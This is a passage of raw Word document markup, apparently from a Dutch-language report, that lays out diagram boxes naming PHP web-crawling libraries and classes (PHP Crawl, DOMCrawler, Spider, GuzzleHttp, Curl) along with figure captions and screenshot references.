                                <w:sz w:val="28"/>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7E25B" id="Text Box 676" o:spid="_x0000_s1240" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:128.15pt;margin-top:136.95pt;width:205pt;height:27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845nsCAABm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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="30A09151" w14:textId="136B2D3C" w:rsidR="00E2204E" w:rsidRPr="009F6B8F" w:rsidRDefault="00E2204E" w:rsidP="00E416AF">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                          <w:sz w:val="28"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="009F6B8F">
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                          <w:sz w:val="28"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Libraries</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DB6FC" w14:textId="6995830D" w:rsidR="00CD0EAE" w:rsidRDefault="00CD0EAE" w:rsidP="00163804"/>
    <w:p w14:paraId="48A75D45" w14:textId="5581D532" w:rsidR="00821293" w:rsidRDefault="00821293" w:rsidP="00FD6EA7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B2061E" w14:textId="77777777" w:rsidR="00821293" w:rsidRPr="00821293" w:rsidRDefault="00821293" w:rsidP="00821293"/>
    <w:p w14:paraId="138EFBAD" w14:textId="741E3415" w:rsidR="004347F1" w:rsidRDefault="004347F1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C0FF57" w14:textId="7B36FAF8" w:rsidR="00DA3634" w:rsidRDefault="0082411B" w:rsidP="00163804">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253125632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30169BBB" wp14:editId="17752A03">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>865505</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5080</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="687" name="Text Box 687"/>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C6866D" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00553D99" w:rsidRDefault="00E2204E" w:rsidP="004347F1">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00553D99">
                              <w:rPr>
                                <w:b/>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9BBB" id="Text Box 687" o:spid="_x0000_s1241" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.15pt;margin-top:.4pt;width:340pt;height:27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" fillcolor="#ffc000 [3207]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="20C6866D" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00553D99" w:rsidRDefault="00E2204E" w:rsidP="004347F1">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00553D99">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Crawler</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004347F1" w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253123584" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B0CAC9B" wp14:editId="478F1546">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-911860</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="685" name="Rectangle 68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4CD19" id="Rectangle 685" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.95pt;margin-top:-71.75pt;width:25pt;height:1031.7pt;z-index:-2501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EHZY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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E59F0" w14:textId="0746F0C3" w:rsidR="00677E26" w:rsidRDefault="0082411B" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253126656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D13643B" wp14:editId="08B369CD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>864235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>34290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="688" name="Text Box 68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1FD664" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="004347F1">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>PHP Crawl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0F70AF85" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="004347F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643B" id="Text Box 688" o:spid="_x0000_s1242" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.05pt;margin-top:2.7pt;width:340pt;height:45.2pt;z-index:2531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" fillcolor="#ffd966 [1943]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7B1FD664" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="004347F1">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>PHP Crawl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0F70AF85" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="004347F1">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>DOMCrawler</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C26333">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDF9DA" w14:textId="437CBE61" w:rsidR="004347F1" w:rsidRDefault="0082411B" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253127680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C38D41B" wp14:editId="1382CC80">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>862965</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>306070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="345440"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="689" name="Text Box 689"/>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B33609" w14:textId="3912D2A1" w:rsidR="00E2204E" w:rsidRPr="00CA5627" w:rsidRDefault="00E2204E" w:rsidP="00CA5627">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D41B" id="Text Box 689" o:spid="_x0000_s1243" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:67.95pt;margin-top:24.1pt;width:340.05pt;height:27.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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0CB33609" w14:textId="3912D2A1" w:rsidR="00E2204E" w:rsidRPr="00CA5627" w:rsidRDefault="00E2204E" w:rsidP="00CA5627">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0082411B">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Klasses</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5F750A" w14:textId="63074E85" w:rsidR="004347F1" w:rsidRDefault="004347F1" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7250A6D7" w14:textId="7ACBD758" w:rsidR="004347F1" w:rsidRDefault="00DE5F14" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253128704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79114E9D" wp14:editId="26ACB086">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>863600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>36195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="45974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4318635" cy="4597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65F556" w14:textId="1634C0ED" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00DE5F14">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Crawl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="75C80A01" w14:textId="00DA019E" w:rsidR="00E2204E" w:rsidRPr="00DE5F14" w:rsidRDefault="00E2204E" w:rsidP="00DE5F14">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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E9D" id="Text Box 698" o:spid="_x0000_s1244" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68pt;margin-top:2.85pt;width:340.05pt;height:36.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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6B65F556" w14:textId="1634C0ED" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00DE5F14">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Crawl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="75C80A01" w14:textId="00DA019E" w:rsidR="00E2204E" w:rsidRPr="00DE5F14" w:rsidRDefault="00E2204E" w:rsidP="00DE5F14">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Spider</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="090A68F2" w14:textId="64EB3300" w:rsidR="004347F1" w:rsidRDefault="004347F1" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58816B04" w14:textId="1AED3EA9" w:rsidR="004347F1" w:rsidRDefault="005A53AC" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253129728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7356FA6E" wp14:editId="259417E7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>296545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1255395</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5458460" cy="2783840"/>
            <wp:effectExtent l="25400" t="25400" r="27940" b="3556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tart spider.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5458460" cy="2783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156352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32BD5E67" wp14:editId="561C08B4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>356235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>113665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5461000" cy="800100"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="705" name="Text Box 705"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="54610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5F331F" w14:textId="48B1620E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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D5E67" id="Text Box 705" o:spid="_x0000_s1245" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:28.05pt;margin-top:8.95pt;width:430pt;height:63pt;z-index:2531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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6D5F331F" w14:textId="48B1620E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007B04C5">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDBC420" w14:textId="10397ECE" w:rsidR="0039450B" w:rsidRDefault="00F03C4F" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253229056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08C259E4" wp14:editId="3E7AF34A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>292735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2857500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1206500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="826" name="Text Box 826"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1206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A096C" w14:textId="2B6B4B81" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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259E4" id="Text Box 826" o:spid="_x0000_s1246" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:23.05pt;margin-top:225pt;width:95pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="262A096C" w14:textId="2B6B4B81" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.20</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007B04C5">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52748640" w14:textId="1885AE4B" w:rsidR="007A28D2" w:rsidRDefault="00530C47" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253130752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="378917C4" wp14:editId="0F9D0012">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>297815</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>266065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5461000" cy="2134235"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="2476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spider crawl.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5461000" cy="213423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B4F333E" w14:textId="7E778D80" w:rsidR="007A28D2" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253230080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B7C612F" wp14:editId="31E41182">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>233680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2168525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="827" name="Text Box 82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CA0A0" w14:textId="2813259A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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C612F" id="Text Box 827" o:spid="_x0000_s1247" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:18.4pt;margin-top:170.75pt;width:90pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4B0CA0A0" w14:textId="2813259A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.21</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007A28D2">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371EB28" w14:textId="21230D6A" w:rsidR="00D20E87" w:rsidRDefault="00D20E87">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253136896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53F4B49D" wp14:editId="25363051">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>864870</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1144270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="345440"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="766" name="Text Box 766"/>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E0EE69" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00CA5627" w:rsidRDefault="00E2204E" w:rsidP="00501C3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B49D" id="Text Box 766" o:spid="_x0000_s1248" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.1pt;margin-top:90.1pt;width:340.05pt;height:27.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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15E0EE69" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00CA5627" w:rsidRDefault="00E2204E" w:rsidP="00501C35">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0082411B">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Klasses</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253135872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38B0AF84" wp14:editId="789FCADB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>866140</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>575310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="765" name="Text Box 765"/>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6A4F7" w14:textId="1752FABF" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00501C35">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>GuzzleHttp</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="78E8D57C" w14:textId="656A3F3C" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00501C35">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AF84" id="Text Box 765" o:spid="_x0000_s1249" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.2pt;margin-top:45.3pt;width:340pt;height:45.2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" fillcolor="#ffd966 [1943]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3C56A4F7" w14:textId="1752FABF" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00501C35">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>GuzzleHttp</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="78E8D57C" w14:textId="656A3F3C" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00501C35">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Curl</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253134848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D69EAD3" wp14:editId="0369459A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>866775</wp:posOffset>
